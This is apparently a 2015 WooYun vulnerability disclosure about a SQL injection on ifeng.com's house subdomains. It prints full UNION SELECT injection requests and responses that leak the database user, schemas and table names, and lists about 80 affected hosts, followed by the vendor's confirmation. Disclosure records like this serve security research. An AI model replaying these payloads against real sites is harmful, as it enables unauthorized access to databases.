当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149202

漏洞标题:凤凰网上百网站存在同一SQL注入漏洞

相关厂商:凤凰网

漏洞作者: 路人甲

提交时间:2015-10-26 15:35

修复时间:2015-12-10 15:46

公开时间:2015-12-10 15:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

详细说明:

house.ifeng.com的二级域名都存在注入,直接可查sql

GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,user(),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hn.house.ifeng.com/column
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Host: hn.house.ifeng.com
Cookie: ifh_site=17649%2Chn; city_redirected=13
HTTP/1.1 200 OK
Server: ifengweb/1.2.8
Date: Sat, 24 Oct 2015 09:38:52 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 141
jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\[email protected]","theurl":null}])
GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(select+count(*)FROM+information_schema.schemata),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1a5","theurl":null}])
GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(select+distinct+group_concat(0x7e,schema_name,0x7e)+FROM+information_schema.schemata),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hn.house.ifeng.com/column
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Host: hn.house.ifeng.com
Cookie: ifh_site=17649%2Chn; city_redirected=13
jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1a~information_schema~,~app_house~,~estate_house~,~test~","theurl":null}])

GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(SELECT+group_concat(table_name)+FROM+information_schema.tables+WHERE+table_schema='app_house'),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://hn.house.ifeng.com/column
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Host: gz.house.ifeng.com
Cookie: ifh_site=17649%2Chn; city_redirected=13
HTTP/1.1 200 OK
Server: ifengweb/1.2.8
Date: Sat, 24 Oct 2015 10:59:55 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 458
jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f
\uff1aacl_func,acl_group,acl_group_func,acl_module,acl_page,acl_permission,acl_role,acl_role_permission,acl_user_role,cache,city_phone,fyh_activity,fyh_game_egg,fyh_game
_egg_prize,fyh_game_egg_prizedetail,fyh_game_egg_user,fyh_log,fyh_phone,fyh_pic,fyh_special,fyh_user,fyh_user_activity,house_acl_user,house_menu,lp_apply,lp_area,lp_area
_vw,lp_ci","theurl":null}])


不完全统计有如下网站存在该漏洞

1010.house.ifeng.com
27taobao.house.ifeng.com
2c.house.ifeng.com
2fapp.house.ifeng.com
2fbaike.house.ifeng.com
2fcd.house.ifeng.com
2fdl.house.ifeng.com
2fgz.house.ifeng.com
2fhz.house.ifeng.com
2fsh.house.ifeng.com
2fsz.house.ifeng.com
2fzz.house.ifeng.com
7bbs.house.ifeng.com
8gz.house.ifeng.com
app.house.ifeng.com
app10e0.house.ifeng.com
bbs.house.ifeng.com
bd.house.ifeng.com
bj.house.ifeng.com
blog.house.ifeng.com
cd.house.ifeng.com
cft.house.ifeng.com
changsha.house.ifeng.com
chengde.house.ifeng.com
club.house.ifeng.com
comapp.house.ifeng.com
cq.house.ifeng.com
dl.house.ifeng.com
eb.house.ifeng.com
fj.house.ifeng.com
gmtdl.house.ifeng.com
gu.house.ifeng.com
gy.house.ifeng.com
gz.house.ifeng.com
hd.house.ifeng.com
hf.house.ifeng.com
hn.house.ifeng.com
house.ifeng.com
hs.house.ifeng.com
httpapp.house.ifeng.com
httpbbs.house.ifeng.com
huizhou.house.ifeng.com
hz.house.ifeng.com
i.ifeng.com
j.house.ifeng.com
jn.house.ifeng.com
jr.house.ifeng.com
ld.house.ifeng.com
ly.house.ifeng.com
lz.house.ifeng.com
my.house.ifeng.com
nb.house.ifeng.com
news.house.ifeng.com
nj.house.ifeng.com
nn.house.ifeng.com
nt.house.ifeng.com
opencity.house.ifeng.com
p2p.house.ifeng.com
qd.house.ifeng.com
qhd.house.ifeng.com
qz.house.ifeng.com
s.house.ifeng.com
sh.house.ifeng.com
sy.house.ifeng.com
sz.house.ifeng.com
taobao.house.ifeng.com
tj.house.ifeng.com
toblog.house.ifeng.com
totaobao.house.ifeng.com
tty.house.ifeng.com
u002fsh.house.ifeng.com
weifang.house.ifeng.com
weihai.house.ifeng.com
world.house.ifeng.com
xa.house.ifeng.com
xm.house.ifeng.com
xt.house.ifeng.com
yantai.house.ifeng.com
yt.house.ifeng.com
z.house.ifeng.com
zz.house.ifeng.com

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-26 15:45

厂商回复:

非常感谢您对凤凰网信息安全的帮助,不过这是一套程序,泛解析到了一组业务中,并非“上百网站”。

最新状态:

暂无